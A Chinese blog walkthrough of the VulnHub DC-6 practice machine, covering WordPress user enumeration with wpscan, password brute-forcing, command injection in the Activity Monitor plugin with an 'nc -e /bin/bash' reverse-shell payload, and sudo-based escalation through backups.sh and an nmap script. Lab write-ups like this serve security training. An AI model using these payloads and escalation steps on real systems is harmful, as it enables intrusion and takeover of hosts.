vulnhub - DC 6

扫描开启的服务:开启了22、80端口

目录遍历

查看80端口,发现是一个WordPress客框架

使用wpscan进行用户枚举

wpscan --url http://wordy --enumerate u 发现有五个用户

没有思路,在dc-6下载的官网有提示

根据提示生成密码字典

把五个用户写在一个文本,使用密码字典依次爆破

有一个mark用户 helpdesk01


在后台进行登录

这里有一个插件activity monitor;他有一个远程命令执行漏洞

Tools 这里有一个提交Lookup

抓包验证

命令输入执行nc监听

127.0.0.9 | nc -e /bin/bash 192.168.56.133 4444

查看home目录

Mark/stuff目录下面有一个文件

Graham是前面爆出来的用户;

22端口是开启的,可以尝试ssh连接

进行尝试提权

sudo -l 查看当前用户的执行权限

jens/下面的backups.sh是一个可执行shell文件

在里面写上一个/bin/bash并执行,实行水平越权;可以拿到一个shell

Sudo -u jens ./backups.sh

sudo -l 查看当前用户的执行权限

有一个nmap执行文件,是以root权限执行的

写一个nmap脚本,在执行脚本文件的时候,实现水平越权

成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值